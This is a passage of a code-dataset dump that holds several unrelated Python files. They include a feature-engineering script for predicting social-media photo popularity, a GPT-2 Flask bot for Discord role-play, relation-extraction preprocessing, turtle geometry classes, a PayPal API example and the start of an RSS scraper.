pd.DataFrame(train_temporalspatial)\n\ntrain_userdata = json.load(open('./data/train_all_json/train_userdata.json', encoding=\"utf-8\"))\ntrain_userdata_pd = pd.DataFrame(train_userdata)\n\ntrain_img_pd = pd.read_csv('./data/train_all_json/train_img.txt', header=None)\ntrain_img_pd.columns = ['img']\ntrain_img_pd['img_file'] = train_img_pd['img'].apply(lambda x: './data/train/' + x[30:] + '.jpg')\n\ntrain_label_pd = pd.read_csv('./data/train_all_json/train_label.txt', header=None)\ntrain_label_pd.columns = ['label']\n\ntrain_data = train_category_pd.merge(train_additional_pd, on=('Pid', 'Uid'), how='left')\ntrain_data = train_data.merge(train_tags_pd, on=('Pid', 'Uid'), how='left')\ntrain_data = train_data.merge(train_temporalspatial_pd, on=('Pid', 'Uid'), how='left')\n\ntrain_data = pd.concat([train_data, train_userdata_pd, train_img_pd, train_label_pd], axis=1)\nprint(len(train_data))\nprint(train_data.columns)\n\n\n# In[3]:\n\n\ntest_category = json.load(open('./data/test_all_json/test_category.json', encoding=\"utf-8\"))\ntest_category_pd = pd.DataFrame(test_category)\n\ntest_additional = json.load(open('./data/test_all_json/test_additional.json', encoding=\"utf-8\"))\ntest_additional_pd = pd.DataFrame(test_additional)\n\ntest_tags = json.load(open('./data/test_all_json/test_tags.json', encoding=\"utf-8\"))\ntest_tags_pd = pd.DataFrame(test_tags)\n\ntest_temporalspatial = json.load(open('./data/test_all_json/test_temporalspatial.json', encoding=\"utf-8\"))\ntest_temporalspatial_pd = pd.DataFrame(test_temporalspatial)\n\ntest_userdata = json.load(open('./data/test_all_json/test_userdata.json', encoding=\"utf-8\"))\ntest_userdata_pd = 
pd.DataFrame(test_userdata)\n\ntest_img_pd = pd.read_csv('./data/test_all_json/test_imgfile.txt', header=None)\ntest_img_pd.columns = ['img']\n# test_img_pd['img_file'] = test_img_pd['img']\ntest_img_pd['img_file'] = test_img_pd['img']\n\ntest_data = test_category_pd.merge(test_additional_pd, on=('Pid', 'Uid'), how='left')\ntest_data = test_data.merge(test_tags_pd, on=('Pid', 'Uid'), how='left')\ntest_data = test_data.merge(test_temporalspatial_pd, on=('Pid', 'Uid'), how='left')\n\ntest_data = pd.concat([test_data, test_userdata_pd, test_img_pd], axis=1)\ntest_data['label'] = -1\n\nprint(len(test_data))\nprint(test_data.columns)\n\n\n# In[4]:\n\n\n\ndef pandas_split_valid_test_dataset(pandas_dataset, valid_ratio=0.1, test_ratio=0.1, shuffle=True):\n    \n    index = list(range(len(pandas_dataset)))\n#     if shuffle:\n#         random.shuffle(index)\n    \n    length = len(pandas_dataset)\n    len_valid = int(length * valid_ratio + 0.6)\n    len_test = int(length * test_ratio + 0.6)\n\n    train_data = pandas_dataset.loc[index[:-len_test-len_valid]]\n    valid_data = pandas_dataset.loc[index[-len_test-len_valid:-len_test]]\n    test_data = pandas_dataset.loc[index[-len_test:]]\n    return train_data, valid_data, test_data\n\ntrain_df, valid_df, test_df = pandas_split_valid_test_dataset(train_data, valid_ratio=0.1, test_ratio=0.1, shuffle=True)\nprint(len(train_df), len(valid_df), len(test_df))\n\n\ntrain_df['train_type'] = 0\nvalid_df['train_type'] = 1\ntest_df['train_type'] = 2\ntest_data['train_type'] = -1\n\nall_data = pd.concat([train_df, valid_df, test_df, test_data], axis=0, sort=False)\nall_data = all_data.reset_index(drop=True)\n# print(len(all_data))\n# all_data = all_data.fillna('0')\n\nall_data.to_csv('./data/combine_data_530.csv', header=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[5]:\n\n\nall_data = pd.read_csv('./data/combine_data_530.csv', low_memory=False)\nall_data = all_data.fillna('0')\n\n\n# In[6]:\n\n\nglove_file ='./data/glove.42B.300d.txt' # the pre-trained GloVe vectors we already have\ntmp_file = './data/word2vec.txt' # where the file converted to word2vec format will be saved\n(count, dimensions) = glove2word2vec(glove_file, tmp_file)\nprint(count, dimensions)\nprint('glove2word2vec over')\n\n# Load the converted file  # use gensim to load the word2vec vectors\nwv_model = KeyedVectors.load_word2vec_format('./data/word2vec.txt')\nprint('load over')\n\n\n# In[7]:\n\n\n\n\nAlltags_split = all_data['Alltags'].apply(lambda x: x.lower().split(' '))\n# Alltags_split = all_data['Alltags'].apply(lambda x: [w for w in re.sub('[^0-9a-zA-Z]', \" \", x).lower().split(' ') if w != \"\"])\n\ntags_ans = []\nfor sentence in Alltags_split:\n    v = [wv_model[w] for w in sentence if w in wv_model]\n    if len(v) == 0:\n        tags_ans.append(np.zeros(300))\n    else:\n        tags_ans.append(np.mean(v, 0))\n\nalltags_feature = np.array(tags_ans)\n\npd_alltags_feature = pd.DataFrame(alltags_feature, dtype='float')\npd_alltags_feature.columns = ['alltags_fe_{}'.format(i) for i in range(300)]\npd_alltags_feature.to_csv('./data/alltags_feature.csv', header=True, index=None)\n\nprint('alltag over!')\n\n\n# In[8]:\n\n\n\nTitle_split = all_data['Title'].apply(lambda x: x.lower().split(' '))\n# Title_split = all_data['Title'].apply(lambda x: [w for w in re.sub('[^0-9a-zA-Z]', \" \", x).lower().split(' ') if w != \"\"])\n\ntitle_ans = []\nfor sentence in Title_split:\n    v = [wv_model[w] for w in sentence if w in wv_model]\n    if len(v) == 0:\n        title_ans.append(np.zeros(300))\n    else:\n        title_ans.append(np.mean(v, 0))\n\ntitle_feature = np.array(title_ans)\n\npd_title_feature = pd.DataFrame(title_feature, dtype='float')\npd_title_feature.columns = 
['title_fe_{}'.format(i) for i in range(300)]\npd_title_feature.to_csv('./data/title_feature.csv', header=True, index=None)\n\nprint('title over!')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[9]:\n\n\nuser_path = dict()\nfor i in range(len(all_data)):\n user = all_data['Uid'][i]\n path = all_data['Pathalias'][i]\n \n if user not in user_path:\n user_path[user] = set()\n if path != 'None':\n user_path[user].add(path)\n\nPathalias_list = []\nfor i in range(len(all_data)):\n user = all_data['Uid'][i]\n if len(user_path[user]) != 0:\n Pathalias_list.append(list(user_path[user])[0])\n else:\n Pathalias_list.append('None')\nall_data['Pathalias'] = Pathalias_list\n\n\n# In[10]:\n\n\nuser_additional = pd.read_csv('./data/user_additional.csv')\nuser_additional[user_additional['Pathalias'] == 'None'] = ['None', 0, 0, 0, 0, 0, 0, 0, 0]\n\nall_data = pd.merge(all_data, user_additional, on='Pathalias', how='left')\nall_data['label'] = all_data['label'].apply(lambda x: x if x!=-1 else 0)\n\n\n# In[11]:\n\n\ndef get_img_data(img_file):\n if os.path.exists(img_file) == True:\n return img_file\n else:\n return './data/none_picture.jpg'\n\ndef get_feature(data_df):\n\n feature_data = pd.DataFrame()\n feature_data['Pid'] = data_df['Pid']\n feature_data['train_type'] = data_df['train_type']\n \n Uid_set=set(data_df['Uid'])\n Uid_map = dict(zip(Uid_set, list(range(len(Uid_set)))))\n feature_data['Uid'] = data_df['Uid'].map(Uid_map)\n \n feature_data['Uid_count'] = data_df['Uid'].map(dict(data_df.groupby('Uid')['Pid'].count()))\n feature_data['mean_label']= data_df['Uid'].map(dict(data_df.groupby('Uid')['label'].mean()))\n \n # Category\n Category_set=set(data_df['Category'])\n Category_map = dict(zip(Category_set, list(range(len(Category_set)))))\n feature_data['Category'] = data_df['Category'].map(Category_map)\n\n Subcategory_set=set(data_df['Subcategory'])\n Subcategory_map = dict(zip(Subcategory_set, list(range(len(Subcategory_set)))))\n feature_data['Subcategory'] = data_df['Subcategory'].map(Subcategory_map)\n \n Concept_set=set(data_df['Concept'])\n Concept_map = dict(zip(Concept_set, list(range(len(Concept_set)))))\n feature_data['Concept'] = data_df['Concept'].map(Concept_map)\n \n # title alltags base\n feature_data['Title_len'] = data_df['Title'].apply(lambda x: len(x))\n feature_data['Title_number'] = data_df['Title'].apply(lambda x: len(x.lower().split(' ')))\n feature_data['Alltags_len'] = data_df['Alltags'].apply(lambda x: len(x))\n feature_data['Alltags_number'] = data_df['Alltags'].apply(lambda x: len(x.lower().split(' ')))\n \n # img base\n data_df['img_file'] = data_df['img_file'].apply(lambda x: get_img_data('/home/ssd1/yhzhang/SMP2020/' + x))\n img_mode_map = {'P': 0, 'L': 1, 'RGB': 2, 'CMYK': 3}\n img_length, img_width, img_pixel, img_model = [], [], [], []\n for file in data_df['img_file']:\n pm = Image.open(file)\n img_length.append(pm.size[0])\n img_width.append(pm.size[1])\n img_pixel.append(pm.size[0] * pm.size[1])\n img_model.append(img_mode_map[pm.mode])\n feature_data['img_length'] = img_length\n feature_data['img_width'] = img_width\n feature_data['pixel'] = img_pixel\n feature_data['img_model'] = img_model\n \n # title svd\n tf_idf_enc_t = TfidfVectorizer(ngram_range=(1, 2))\n tf_idf_vec_t = tf_idf_enc_t.fit_transform(data_df['Title'])\n svd_enc_t = TruncatedSVD(n_components=20, n_iter=100, random_state=2020)\n mode_svd_t = svd_enc_t.fit_transform(tf_idf_vec_t)\n mode_svd_t = pd.DataFrame(mode_svd_t)\n mode_svd_t.columns = ['svd_mode_t_{}'.format(i) for i in range(20)]\n 
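# NOTE: TfidfVectorizer over word 1-2-grams followed by TruncatedSVD(20) is an LSA-style reduction;\n    # the 20 dense components stand in for the sparse title text as model features.\n    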
feature_data = pd.concat([feature_data, mode_svd_t], axis=1)\n \n # Tags svd\n tf_idf_enc = TfidfVectorizer(ngram_range=(1, 2))\n tf_idf_vec = tf_idf_enc.fit_transform(data_df['Alltags'])\n svd_enc = TruncatedSVD(n_components=20, n_iter=100, random_state=2020)\n mode_svd = svd_enc.fit_transform(tf_idf_vec)\n mode_svd = pd.DataFrame(mode_svd)\n mode_svd.columns = ['svd_mode_{}'.format(i) for i in range(20)]\n feature_data = pd.concat([feature_data, mode_svd], axis=1)\n \n Mediatype_set=set(data_df['Mediatype'])\n Mediatype_map = dict(zip(Mediatype_set, list(range(len(Mediatype_set)))))\n feature_data['Mediatype'] = data_df['Mediatype'].map(Mediatype_map)\n \n # Temporal-spatial\n data_df['datetime'] = data_df['Postdate'].apply(lambda x: datetime.fromtimestamp(int(x)))\n feature_data['hour'] = data_df['datetime'].apply(lambda x: x.hour)\n feature_data['day'] = data_df['datetime'].apply(lambda x: x.day)\n feature_data['weekday'] = data_df['datetime'].apply(lambda x: x.weekday())\n feature_data['week_hour'] = data_df['datetime'].apply(lambda x: x.weekday() * 7 + x.hour)\n feature_data['year_weekday'] = data_df['datetime'].apply(lambda x: x.isocalendar()[1])\n \n feature_data['Longitude'] = data_df['Longitude'].apply(lambda x: float(x))\n feature_data['Latitude'] = data_df['Latitude'].apply(lambda x: float(x))\n \n feature_data['Geoaccuracy'] = pd.DataFrame(data_df['Geoaccuracy'], dtype='int')\n \n # User data\n feature_data['photo_count'] = pd.DataFrame(data_df['photo_count'], dtype='int')\n feature_data['ispro'] = pd.DataFrame(data_df['ispro'], dtype='int')\n \n user_fe = pd.DataFrame(np.array(list(data_df[\"user_description\"].apply(lambda x: x.split(',')))), dtype='float')\n user_fe.columns = ['user_fe_{}'.format(i) for i in range(399)]\n \n loc_fe =pd.DataFrame(np.array(list(data_df[\"location_description\"].apply(lambda x: x[:-2].split(',') if x[:-2] !='' else ['0.0']*400))), dtype='float')\n loc_fe.columns = ['loc_fe_{}'.format(i) for i in range(400)]\n feature_data = pd.concat([feature_data, user_fe, loc_fe], axis=1)\n \n photo_firstdate = data_df['photo_firstdate'].apply(lambda x: datetime.fromtimestamp(int(x) if x!='None' else 0))\n feature_data['firstdate'] = (data_df['datetime'] - photo_firstdate).apply(lambda x: x.days)\n feature_data['firstweek'] = feature_data['firstdate'] // 7\n feature_data['firstmonth'] = feature_data['firstdate'] // 30\n \n photo_firstdatetaken = data_df['photo_firstdatetaken'].apply(lambda x: datetime.fromtimestamp(int(x)))\n feature_data['firstdatetaken'] = (data_df['datetime'] - photo_firstdatetaken).apply(lambda x: x.days)\n feature_data['firstdatetakenweek'] = feature_data['firstdatetaken'] // 7\n feature_data['firstdatetakenmonth'] = feature_data['firstdatetaken'] // 30\n\n # Additional\n feature_data['totalViews'] = pd.DataFrame(data_df['totalViews'], dtype='int')\n feature_data['totalTags'] = pd.DataFrame(data_df['totalTags'], dtype='int')\n feature_data['totalGeotagged'] = pd.DataFrame(data_df['totalGeotagged'], dtype='int')\n feature_data['totalFaves'] = pd.DataFrame(data_df['totalFaves'], dtype='int')\n feature_data['totalInGroup'] = pd.DataFrame(data_df['totalInGroup'], dtype='int')\n feature_data['photoCount'] = pd.DataFrame(data_df['photoCount'], dtype='int')\n meanView, meanTags, meanFaves = [], [], []\n for i in range(len(data_df['photoCount'])):\n if data_df['photoCount'][i] == 0:\n meanView.append(0)\n meanTags.append(0)\n meanFaves.append(0)\n else:\n meanView.append(data_df['totalViews'][i] / data_df['photoCount'][i])\n 
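# these are per-photo averages; the photoCount == 0 branch above guards against ZeroDivisionError\n            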
meanTags.append(data_df['totalTags'][i] / data_df['photoCount'][i])\n meanFaves.append(data_df['totalFaves'][i] / data_df['photoCount'][i])\n feature_data['meanView'] = meanView\n feature_data['meanTags'] = meanTags\n feature_data['meanFaves'] = meanFaves\n feature_data['followerCount'] = pd.DataFrame(data_df['followerCount'], dtype='int')\n feature_data['followingCount'] = pd.DataFrame(data_df['followingCount'], dtype='int')\n \n Ispublic_set=set(data_df['Ispublic'])\n Ispublic_map = dict(zip(Ispublic_set, list(range(len(Ispublic_set)))))\n feature_data['Ispublic'] = data_df['Ispublic'].map(Ispublic_map)\n\n # label\n feature_data['label'] = pd.DataFrame(data_df['label'], dtype='float')\n return feature_data\n\n\nsave_feature_df = get_feature(all_data)\nsave_feature_df.to_csv('./data/feature_data_530.csv', header=True, index=None)\nprint('feature save!')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"runnerxin/HyFea","sub_path":"get_data_feature.py","file_name":"get_data_feature.py","file_ext":"py","file_size_in_byte":15509,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"4427665569","text":"\n\n# python discord_flask.py\n\n\n\nfrom os.path import expanduser\nhome = expanduser(\"~\")\n\n# curl -d \"heystuff\" -X POST http://localhost:8111/submit_text\n\n# TODO: Use smaller model\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\ntokenizer = GPT2Tokenizer.from_pretrained(\"gpt2\")\nmodel = GPT2LMHeadModel.from_pretrained(\"gpt2\", pad_token_id=tokenizer.eos_token_id) \n\n\n\nimport torch\nimport numpy as np\n\n\nfrom flask import Flask, render_template, url_for #, redirect\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '123'\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import TextAreaField\nfrom wtforms.validators import DataRequired\n# from flask import jsonify\nfrom flask import request\n\n\nclass MyForm(FlaskForm):\n input_ = TextAreaField('INPUT', id ='contentcode') #, validators=[DataRequired()])\n\n\n\n\n# @app.route('/', methods=('GET', 'POST'))\n# @app.route('/home', methods=('GET', 'POST'))\n# def home():\n# data = []\n# form = MyForm()\n# if request.method == 'GET':\n# return render_template('home.html', data=data, title='DV', form=form)\n# return render_template('home.html', data=data, title='DV', form=form)\n\n# prompt1 = 'Eberron embraces swashbuckling action and pulp adventure while adding \\\n# a layer of noir intrigue. Daring heroes battle villains in high-stakes \\\n# instances of over-the-top action, dealing with narrow escapes and ominous \\\n# mysteries that threaten the world’s safety. But stories don’t always end \\\n# well, villains sometimes succeed, and there isn’t a perfect answer to every \\\n# problem. Magic is common, and weaved through everyday life. \\\n# \\n Greybeard is a wise wizard that has a staff. I ask Greybeard'\n\n\n\n# prompt1 = 'greybeard: Im an old wizard. I cast speels.\\\n# \\nme: what is your staff made of? \\\n# \\ngreybeard: its a wooden staff, lad \\\n# \\nme: how old are you? \\\n# \\ngreybeard: im as old as the trees, lad \\\n# \\nme: where are we going? \\\n# \\ngreybeard: to wonderland, lad \\\n# \\nme:'\n# prompt2 = \"\\ngreybeard:\"\n\n\n\n\n\ntorn_fristo_1 = \"User: Who are you? \\\n\\nTorn Fristo: I...I don't remember\\\n\\nUser: What are you doing here? \\\n\\nTorn Fristo: Please...help me get out. I'm afraid \\\n\\nUser: What is your name? 
\\\n\\nTorn Fristo: I think...it was Turdy \\\n\\nUser: How did you end up here? \\\n\\nTorn Fristo: I...remember a poopy hole \\\n\\nUser: Where are we? \\\n\\nTorn Fristo: In a Tarasque anus...I think \\\n\\nUser: Will you help us? \\\n\\nTorn Fristo: I'm scared...but I'll try \\\n\\nUser: Are you okay? \\\n\\nTorn Fristo: It smells...poopy in here \\\n\\nUser: What was that? \\\n\\nTorn Fristo: Poop worms...nasty creatures \\\n\\nUser: Are you dead? \\\n\\nTorn Fristo: I'm as dead as this poop...this poop \\\n\\nUser: How can we help you? \\\n\\nTorn Fristo: Free me...please...from this poopy prison \\\n\\nUser:\"\ntorn_firsto_2 = \"\\nTorn Fristo:\"\n\n\n\n\n\n\n\n\n\n@app.route('/submit_text', methods=('GET', 'POST'))\ndef submit_text():\n form = MyForm()\n # if request.method == 'GET':\n # return render_template('home.html', title='DV')\n if request.method == 'POST':\n # print (request._cached_json[0])\n text = request._cached_json[0]['text']\n print (text)\n\n prompt = ''\n\n if text.startswith(\"To Torn:\"):\n text = text.split('To Torn:')[1]\n prompt = torn_fristo_1 + text + torn_firsto_2\n\n elif text.startswith(\"To Karina:\"):\n text = text.split('To Karina:')[1]\n prompt = karina_1 + text + karina_2\n\n elif text.startswith(\"To Kaspar:\"):\n text = text.split('To Kaspar:')[1]\n prompt = kasper_1 + text + kasper_2\n\n # print (prompt)\n\n\n if len(prompt) > 0:\n\n # prompt = prompt1 + text + prompt2\n input_ids = tokenizer.encode(prompt) #, max_length=512)\n input_ids = np.array(input_ids)\n input_ids = np.reshape(input_ids, [1,-1])\n input_ids = torch.tensor(input_ids)\n\n # print (input_ids.shape)\n input_len = input_ids.shape[1]\n # print (len(input_ids))\n\n n_tokens_to_sample = 25\n\n # top_p set 0.75\n aa = model.generate(do_sample=True, top_p=.5, max_length=input_len+n_tokens_to_sample, input_ids=input_ids)\n \n aa = aa.numpy()\n aa = aa[0]\n # print ( tokenizer.decode(aa))\n # print ()\n aa = aa[input_len:]\n text = tokenizer.decode(aa)\n print ('output1:', text)\n\n if '\\nUser:' in text:\n text = text.split('\\nUser:')[0]\n\n if len(text.strip(' ') )== 0: \n return {'hey': ''}, 200\n\n\n return {'hey': text}, 200\n\n else:\n return {'hey': ''}, 200\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='localhost', port=8111)\n\n\n\n\n\n","repo_name":"ChristopherBaim/DiscordBot","sub_path":"discord_flask.py","file_name":"discord_flask.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26097111136","text":"import json\nfrom dotenv import load_dotenv\nfrom torch.utils.data import Dataset, DataLoader\nfrom itertools import permutations\n\nload_dotenv()\n\nclass DatasetMapper(Dataset):\n\n def __init__(self, sentences, entities_1, entities_2, relations):\n self.sentences = sentences\n self.entities_1 = entities_1\n self.entities_2 = entities_2\n self.relations = relations\n\n def __len__(self):\n return len(self.sentences)\n\n def __getitem__(self, idx):\n return self.sentences[idx], self.entities_1[idx], self.entities_2[idx], self.relations[idx]\n\n\ndef prepare_data(data_path, labels2id, batch_size):\n\n sentences, entities_1, entities_2, relations = read_json_file(data_path, labels2id)\n data_loader = DataLoader(DatasetMapper(sentences, entities_1, entities_2, relations), batch_size=batch_size)\n return data_loader\n\n\n# return sentences, idx within the sentence of entity-markers-start, relation labels\ndef read_json_file(json_file, labels2id, 
multi_label=False):\n\n sentences, entities_1, entities_2, relations = [], [], [], []\n\n with open(json_file) as data_file:\n for json_elem in data_file:\n document = json.loads(json_elem)\n\n # consider only the sentences with at least 2 entities\n if len(document[\"ner\"]) > 1:\n\n # create all the possible entity pairs\n entity_pairs = permutations(document[\"ner\"], 2)\n\n for entity_pair in entity_pairs:\n\n # set the entity tokens to inject in the instance\n ent1_start = f'<E1:{entity_pair[0][2]}>'\n ent1_end = f'</E1:{entity_pair[0][2]}>'\n ent2_start = f'<E2:{entity_pair[1][2]}>'\n ent2_end = f'</E2:{entity_pair[1][2]}>'\n\n # build the instance sentence for the model\n sentence_marked = ''\n\n for idx_token in range(len(document[\"sentence\"])):\n\n # nested entities begin\n if idx_token == entity_pair[0][0] and idx_token == entity_pair[1][0]:\n # entity 1 is the biggest: entity 1 encapsulates entity 2\n if entity_pair[0][1] > entity_pair[1][1]:\n sentence_marked += f'{ent1_start} {ent2_start} {document[\"sentence\"][idx_token]} '\n # entity 2 (the shortest one) is one token long\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # entity 2 is the biggest: entity 2 encapsulates entity 1\n else:\n sentence_marked += f'{ent2_start} {ent1_start} {document[\"sentence\"][idx_token]} '\n # entity 1 (the shortest one) is one token long\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n\n # match begin entity 1\n elif idx_token == entity_pair[0][0]:\n sentence_marked += f'{ent1_start} {document[\"sentence\"][idx_token]} '\n # entity 1 is one token long\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n # entity 1 is a nested entity encapsulated inside entity 2\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # match begin entity 2\n elif idx_token == entity_pair[1][0]:\n sentence_marked += f'{ent2_start} {document[\"sentence\"][idx_token]} '\n # entity 2 is one token long\n if idx_token == entity_pair[1][1]:\n sentence_marked += f'{ent2_end} '\n # entity 2 is a nested entity encapsulated inside entity 1\n if idx_token == entity_pair[0][1]:\n sentence_marked += f'{ent1_end} '\n\n # nested entities end\n elif idx_token == entity_pair[0][1] and idx_token == entity_pair[1][1]:\n # entity 1 in the biggest: entity 1 encapsulates entity 2\n if entity_pair[0][0] < entity_pair[1][0]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent2_end} {ent1_end} '\n # entity 2 in the biggest: entity 2 encapsulates entity 1\n else:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent1_end} {ent2_end} '\n\n # match end entity 1\n elif idx_token == entity_pair[0][1]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent1_end} '\n # match end entity 2\n elif idx_token == entity_pair[1][1]:\n sentence_marked += f'{document[\"sentence\"][idx_token]} {ent2_end} '\n\n # regular token\n else:\n sentence_marked += f'{document[\"sentence\"][idx_token]} '\n\n # retrieve relation label\n dataset_relations = [(e1_s, e1_e, e2_s, e2_e, rel, exp, ns, sa) for (e1_s, e1_e, e2_s, e2_e, rel, exp, ns, sa) in document[\"relations\"] if e1_s == entity_pair[0][0] and e1_e == entity_pair[0][1] and e2_s == entity_pair[1][0] and e2_e == entity_pair[1][1]]\n\n # prepare data\n if len(dataset_relations) > 0:\n if multi_label:\n instance_labels = [0] * len(labels2id.keys())\n for elem in dataset_relations:\n instance_labels[labels2id[elem[4]]] = 1\n relations.append(instance_labels)\n else:\n 
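# single-label mode: if several relations are annotated for this entity pair, only the first one is kept\n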
                            relations.append(labels2id[dataset_relations[0][4]])\n                        sentences.append(sentence_marked.strip())\n                        entities_1.append(sentence_marked.split(' ').index(f'{ent1_start}'))\n                        entities_2.append(sentence_marked.split(' ').index(f'{ent2_start}'))\n\n    return sentences, entities_1, entities_2, relations\n","repo_name":"mainlp/CrossRE","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"5878414939","text":"from math import sqrt\r\nimport turtle\r\n\r\ndef draw_rect(rect, canvas):\r\n    if rect.point1.x < rect.point2.x:\r\n        first = rect.point1\r\n        third = rect.point2\r\n    else:\r\n        first = rect.point2\r\n        third = rect.point1\r\n\r\n    second = Point(third.x, first.y)\r\n    fourth = Point(first.x, third.y)\r\n\r\n    canvas.penup()\r\n    canvas.goto(rect.point1.x, rect.point1.y)\r\n    canvas.pendown()\r\n    canvas.forward(first.distance_from_point(second))\r\n    canvas.left(90)\r\n    canvas.forward(second.distance_from_point(third))\r\n    canvas.left(90)\r\n    canvas.forward(third.distance_from_point(fourth))\r\n    canvas.left(90)\r\n    canvas.forward(fourth.distance_from_point(first))\r\n\r\n\r\n\r\nclass Rectangle:\r\n    def __init__(self, point1, point2):\r\n        \"\"\"\r\n        Takes the corner points as input\r\n        :param lowleft: bottom-left corner\r\n        :param upright: top-right corner\r\n        \"\"\"\r\n        self.point1 = point1\r\n        self.point2 = point2\r\n\r\n    def area(self):\r\n        return (self.point2.x - self.point1.x) * (self.point2.y - self.point1.y)\r\n\r\n\"\"\"GuiRectangle is the child, Rectangle is the parent\"\"\"\r\nclass GuiRectangle(Rectangle):\r\n\r\n    def draw(self, canvas):\r\n        draw_rect(Rectangle(self.point1, self.point2), canvas)\r\n\r\n\r\nclass Point:\r\n    def __init__(self, x, y):\r\n        self.x = x\r\n        self.y = y\r\n\r\n    def falls_in_rectangle(self, rect):\r\n        \"\"\"With tuples we could not simply take the n-th element; we have to\r\n        refer to x and y explicitly (rect.lowleft.x, rect.upright.x)\"\"\"\r\n        if rect.point1.x <= self.x <= rect.point2.x and rect.point1.y <= self.y <= rect.point2.y:\r\n            return True\r\n        else:\r\n            return False\r\n\r\n    def distance_from_point(self, point):\r\n        return int(((self.x - point.x)**2 + (self.y - point.y)**2)**0.5)\r\n\r\nclass GuiPoint(Point):\r\n\r\n    def draw(self, canvas, size=5, color='red'):\r\n        canvas.penup()\r\n        canvas.goto(self.x, self.y)\r\n        canvas.pendown()\r\n        canvas.dot(size, color)\r\n\r\n\r\nclass House:\r\n    def __init__(self, wall_area):\r\n        self.wall_area = wall_area\r\n\r\n    def paint_needed(self):\r\n        return self.wall_area *2.5\r\n\r\n\r\nclass Paint:\r\n    def __init__(self, buckets, color):\r\n        self.buckets = buckets\r\n        self.color = color\r\n\r\n    def total_price(self):\r\n        if self.color == \"white\":\r\n            return self.buckets * 1.99\r\n        else:\r\n            return self.buckets * 2.19\r\n\r\n\r\nclass DiscountedPaint(Paint):\r\n    def discounted_price(self, discount_percentage):\r\n        tp = self.total_price()\r\n        return tp - (tp * discount_percentage/100)\r\n\r\nif __name__ == '__main__':\r\n    p_start = Point(90, 90)\r\n    p = GuiPoint(180, 280)\r\n    p_stop = Point(300, 300)\r\n    rect = Rectangle(p_start, p_stop)\r\n    gui_rect = GuiRectangle(p_start, p_stop)\r\n    my_turtle = turtle.Turtle()\r\n    gui_rect.draw(canvas=my_turtle)\r\n    p.draw(canvas=my_turtle, size=20)\r\n\r\n    turtle.done()\r\n\r\n","repo_name":"Nines89/kivy","sub_path":"Advanced 
Python/GeometryGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9741131108","text":"from python_paypal_api.api import Identity, Products\nfrom python_paypal_api.base import PaypalApiException\nimport logging\n\n\ndef py_list_products(**kwargs):\n\n logging.info(\"---------------------------------\")\n logging.info(\"Catalog > list_products()\")\n logging.info(\"---------------------------------\")\n\n credentials = dict(\n client_id=\"your-client-id\",\n client_secret=\"your-client-secret\",\n client_mode=\"your-mode\" # PRODUCTION OR SANDBOX(default)\n )\n\n try:\n\n result = Products(credentials=credentials, store_credentials=False, debug=True).list_products(\n **kwargs\n )\n document_dict = result.payload\n logging.info(result)\n\n except Exception as error:\n logging.info(error)\n\n\ndef py_get_userinfo():\n\n logging.info(\"---------------------------------\")\n logging.info(\"Identity > py_get_userinfo\")\n logging.info(\"---------------------------------\")\n\n try:\n\n # result = Identity(account=\"production\", store_credentials=True, debug=True).get_userinfo(\n result = Identity(debug=True).get_userinfo(\n )\n logging.info(result)\n\n except PaypalApiException as error:\n logging.error(error)\n\n except Exception as error:\n logging.info(error)\n\nif __name__ == '__main__':\n\n logger = logging.getLogger(\"test\")\n \n py_get_userinfo()\n \n py_list_products(\n total_required=True,\n page_size=1,\n page=2\n )\n","repo_name":"denisneuf/python-paypal-api","sub_path":"docs/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"25708763910","text":"'''\nWrite a script that prints out all the squares of numbers from 1- 50\n\nUse a for loop that demonstrates the use of the range function.\n\n'''\n\nn = 0\nfor i in range(1, 50+1):\n n = i ** 2\n print(n)","repo_name":"igorlongoria/python-fundamentals","sub_path":"04_conditionals_loops/04_10_squares.py","file_name":"04_10_squares.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4528707348","text":"import os\nfrom typing import Any, Dict, List\nimport re\nfrom datetime import datetime\n\nimport atoma\nimport json\nimport feedparser\n\nfrom bs4 import BeautifulSoup\nimport requests\n\nfrom .processors import process_bylines\nfrom .database import get_database_connection\nfrom matplotlib import pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nxml_urls = [\n \"https://www.purdue.edu/newsroom/rss/academics.xml\",\n \"https://www.purdue.edu/newsroom/rss/AdvNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/AgriNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/BizNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/community.xml\",\n \"https://www.purdue.edu/newsroom/rss/DiversityNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EdCareerNews.xml\",\n \"https://www.purdue.edu/newsroom/rss/EventNews.xml\",\n 